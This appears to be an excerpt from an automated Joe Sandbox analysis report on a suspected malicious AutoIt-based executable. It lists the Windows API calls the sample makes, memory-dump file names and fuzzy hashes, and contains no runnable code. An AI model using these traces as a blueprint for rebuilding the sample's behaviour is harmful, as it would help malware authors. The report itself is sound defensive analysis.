                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00666733
                                                                    • _memset.LIBCMT ref: 00666754
                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006667A6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 006667AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                    • String ID:
                                                                    • API String ID: 1157408455-0
                                                                    • Opcode ID: 607d18aa0b32c01c99a0a10f31de36756d2a933796640ee1e8d89df5f4be9ac8
                                                                    • Instruction ID: b11200d3e823c7567a8c252fb23d839fb7c62561028d7a6db00a01f8bffc5a5b
                                                                    • Opcode Fuzzy Hash: 607d18aa0b32c01c99a0a10f31de36756d2a933796640ee1e8d89df5f4be9ac8
                                                                    • Instruction Fuzzy Hash: 521106769012287AE720ABA5AC4DFEBBABCEF45764F10419AF505E71C0D2705F80CBA4
                                                                    APIs
                                                                      • Part of subcall function 0065AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0065AA79
                                                                      • Part of subcall function 0065AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0065AA83
                                                                      • Part of subcall function 0065AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0065AA92
                                                                      • Part of subcall function 0065AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0065AA99
                                                                      • Part of subcall function 0065AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065AAAF
                                                                    • GetLengthSid.ADVAPI32(?,00000000,0065ADE4,?,?), ref: 0065B21B
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0065B227
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0065B22E
                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0065B247
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                    • String ID:
                                                                    • API String ID: 4217664535-0
                                                                    • Opcode ID: 30669446b5c340f3077336124d896615585c9e92fbc71190c71fe04834149039
                                                                    • Instruction ID: 2617770632a9250ef3609acb66e0bd80a58d024b3aa6f3d5de26dd6e1715ccd3
                                                                    • Opcode Fuzzy Hash: 30669446b5c340f3077336124d896615585c9e92fbc71190c71fe04834149039
                                                                    • Instruction Fuzzy Hash: 5B119171A00205EFDB049F98DC85ABEB7AAEF85305F14A02DE94397350D731AE48CB20
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0065B498
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4AA
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4C0
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065B4DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 62dc089feb45561d51716f904ff2a2c19e5adaada039573d046a810e57ebb311
                                                                    • Instruction ID: 7bcc18fcfdbda6283eb8a8272aa08b2b45a64fbe7f0ddf7b6262808371cc7dac
                                                                    • Opcode Fuzzy Hash: 62dc089feb45561d51716f904ff2a2c19e5adaada039573d046a810e57ebb311
                                                                    • Instruction Fuzzy Hash: 8F115A7A900218FFDB21DFA8C881EDDBBB5FB08700F204091EA04B7294D771AE11DB94
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0063B5A5
                                                                    • GetClientRect.USER32(?,?), ref: 0069E69A
                                                                    • GetCursorPos.USER32(?), ref: 0069E6A4
                                                                    • ScreenToClient.USER32(?,?), ref: 0069E6AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: 80b795030f2c1203dceaf2647739d2c6d37ab44e98b04520b8fcacfdec74192a
                                                                    • Instruction ID: 252199648b11bd9fe4d06f4b8fb5887459c3672e01cba772a980c9b676d625a3
                                                                    • Opcode Fuzzy Hash: 80b795030f2c1203dceaf2647739d2c6d37ab44e98b04520b8fcacfdec74192a
                                                                    • Instruction Fuzzy Hash: 34113671A00129BBCB10EF94C8858EE7BBAEB0A314F001455FA02E7640D330BA82CBA5
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00667352
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00667385
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0066739B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006673A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 6731e6613d27b071369dcf95bf7832d5236ca5d5b6fbcbd9bfa8ad608b6e47b1
                                                                    • Instruction ID: 70e1289101bddd44e4978844f1f14099c5fd7c430060591eca35e7c004ae6438
                                                                    • Opcode Fuzzy Hash: 6731e6613d27b071369dcf95bf7832d5236ca5d5b6fbcbd9bfa8ad608b6e47b1
                                                                    • Instruction Fuzzy Hash: 7C110872A04254BFC7019B68DC49ADE7BAF9B45314F144315F921E3351D6709E008BA0
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
                                                                    • GetStockObject.GDI32(00000011), ref: 0063D1CE
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 33a3e85611a44241c2852599baa111894f97fc06895dac61d1b16d63c50787a9
                                                                    • Instruction ID: 375527f5c9a12b189c02ca8e72060402f9a9936e7d82d941f4b3988f2daf1c92
                                                                    • Opcode Fuzzy Hash: 33a3e85611a44241c2852599baa111894f97fc06895dac61d1b16d63c50787a9
                                                                    • Instruction Fuzzy Hash: CA11AD72501509BFEF125F90AC50EEABB6FFF093A4F041106FA0552150C732ED61ABE0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction ID: d0361ae578d3862cf8603e886bd68818dda00829b80281a49a85a2b4bc8c3a74
                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                    • Instruction Fuzzy Hash: 31017E3200014ABBCF125E84DC168EE3F23BB18356F488495FE1959131D736CAB6AB85
                                                                    APIs
                                                                      • Part of subcall function 00647A0D: __getptd_noexit.LIBCMT ref: 00647A0E
                                                                    • __lock.LIBCMT ref: 0064748F
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 006474AC
                                                                    • _free.LIBCMT ref: 006474BF
                                                                    • InterlockedIncrement.KERNEL32(01271168), ref: 006474D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 2704283638-0
                                                                    • Opcode ID: 91ff79bb28ad9143ab19f5c6efb4bf3c488137437670d8d19c553a2ea1066eea
                                                                    • Instruction ID: 48ab1e67793409340b580b932926b2f6a20d0bbf08be2c0910455f05eb6112e4
                                                                    • Opcode Fuzzy Hash: 91ff79bb28ad9143ab19f5c6efb4bf3c488137437670d8d19c553a2ea1066eea
                                                                    • Instruction Fuzzy Hash: DD019635D0A611DBC751AF6495057ADBBA3BF06711F16400AF414B7790CB346941CFDA
                                                                    APIs
                                                                      • Part of subcall function 0063AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
                                                                      • Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063AFF2
                                                                      • Part of subcall function 0063AF83: BeginPath.GDI32(?), ref: 0063B009
                                                                      • Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063B033
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068EA8E
                                                                    • LineTo.GDI32(00000000,?,?), ref: 0068EA9B
                                                                    • EndPath.GDI32(00000000), ref: 0068EAAB
                                                                    • StrokePath.GDI32(00000000), ref: 0068EAB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 9d96752aa61bf665cc386e42c63769f879edd7807a78dafbd6a6f092cf9ca655
                                                                    • Instruction ID: 5b43e1a0be7ed853fc28da8674cec36fee59ee5fc8e8a58a8d3159a164ffba70
                                                                    • Opcode Fuzzy Hash: 9d96752aa61bf665cc386e42c63769f879edd7807a78dafbd6a6f092cf9ca655
                                                                    • Instruction Fuzzy Hash: 40F05E31005259BBDB12AF94AC09FCA3F5BAF07711F044201FA12651E187756652DB99
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065C84A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0065C85D
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0065C864
                                                                    • AttachThreadInput.USER32(00000000), ref: 0065C86B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 2710830443-0
                                                                    • Opcode ID: 04f454f3c1ce767b48a7c2c865ed6f825cb0303ab7ba7f4796b2d67bd0cf0798
                                                                    • Instruction ID: 0feeae7f238d588de1e1b45a19f05285fbadd26e80815704514c02ff911ec93e
                                                                    • Opcode Fuzzy Hash: 04f454f3c1ce767b48a7c2c865ed6f825cb0303ab7ba7f4796b2d67bd0cf0798
                                                                    • Instruction Fuzzy Hash: D5E030711412247ADB102B61DC0DEDB7F5DEF067A1F009011B90A84850C6719585DFE0
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0065B0D6
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0065AC9D), ref: 0065B0DD
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0065AC9D), ref: 0065B0EA
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0065AC9D), ref: 0065B0F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: 62a1f46fa3586d374fc5173f5c3649007ae8ff2823a9eebffdbbb1db24261ee3
                                                                    • Instruction ID: 83f888001fd9ebc0170b174c30f1eafa698d3afd7074889c940abedf8b9d6329
                                                                    • Opcode Fuzzy Hash: 62a1f46fa3586d374fc5173f5c3649007ae8ff2823a9eebffdbbb1db24261ee3
                                                                    • Instruction Fuzzy Hash: FAE08672601211ABD7202FB15C0DF873BAAEF56792F019818F643D6080DB349406CF60
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 0063B496
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0063B4A0
                                                                    • SetBkMode.GDI32(?,00000001), ref: 0063B4B5
                                                                    • GetStockObject.GDI32(00000005), ref: 0063B4BD
                                                                    • GetWindowDC.USER32(?,00000000), ref: 0069DE2B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0069DE38
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0069DE51
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0069DE6A
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0069DE8A
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0069DE95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: d6f8ebe5d14c260b335bae9154e4a05f0d0b6680e69c604b8fb6eb15ed960909
                                                                    • Instruction ID: 1d6df023590888e9021fa083270c3e5a37337e2d0670d0b6ff386732676fb8ee
                                                                    • Opcode Fuzzy Hash: d6f8ebe5d14c260b335bae9154e4a05f0d0b6680e69c604b8fb6eb15ed960909
                                                                    • Instruction Fuzzy Hash: BDE06D31500240AEDF216F64AC09BD83B12AB12339F00D266F66A584E2C3714981CF21
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0065B2DF
                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0065B2EB
                                                                    • CloseHandle.KERNEL32(?), ref: 0065B2F4
                                                                    • CloseHandle.KERNEL32(?), ref: 0065B2FC
                                                                      • Part of subcall function 0065AB24: GetProcessHeap.KERNEL32(00000000,?,0065A848), ref: 0065AB2B
                                                                      • Part of subcall function 0065AB24: HeapFree.KERNEL32(00000000), ref: 0065AB32
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    • Opcode ID: d9c13fb442757d195a29fe2f72baada76923fd29cd1137aa3b3890de23a0a6bb
                                                                    • Instruction ID: 2e66d488a40bfb67f52fc75d471d083451bff4ed7300279e1b11caa9c3c7efaf
                                                                    • Opcode Fuzzy Hash: d9c13fb442757d195a29fe2f72baada76923fd29cd1137aa3b3890de23a0a6bb
                                                                    • Instruction Fuzzy Hash: CCE0B63A104005BBCB013FA5EC08859FBA7FF8A3613109221F62681971CB32A871EF91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: a4b987fc66be230cee6235bbf3ffb71f5adddec6940708723b24484db5a0019b
                                                                    • Instruction ID: ccd799e41eb6307d3d15094c39ad5c1bfdb04e775ac901cd80969324ac828d11
                                                                    • Opcode Fuzzy Hash: a4b987fc66be230cee6235bbf3ffb71f5adddec6940708723b24484db5a0019b
                                                                    • Instruction Fuzzy Hash: B2E046B1500204EFDF006F70D848A2E7BAAEB4C350F12F80AFC5B8B650CB74A8418F90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 6deeac66d231541429b6247a45ea2480d131fb33ed8c1ee5ec7debc668f4b0cf
                                                                    • Instruction ID: fa73e68b20663103c38b5110e96833a90ec51659da29cba61dc6f92e0d5f4375
                                                                    • Opcode Fuzzy Hash: 6deeac66d231541429b6247a45ea2480d131fb33ed8c1ee5ec7debc668f4b0cf
                                                                    • Instruction Fuzzy Hash: 5EE046B1500200EFDB006F70D84862D7BAAEB4D390F12E809F95B8B650CB78A8018F50
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0065DEAA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: e440f900708f1f1a868551126dcc911f989874c67629c3722e9ca93cea5449fc
                                                                    • Instruction ID: f7fa10b4b42eb941c1e1f6f2eee2df08a6a98dd0ff36b1950543f40137ab3265
                                                                    • Opcode Fuzzy Hash: e440f900708f1f1a868551126dcc911f989874c67629c3722e9ca93cea5449fc
                                                                    • Instruction Fuzzy Hash: 5A913770600602AFDB64DF64C884A6ABBF6BF49711F10856EF84ACB791DB71E845CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
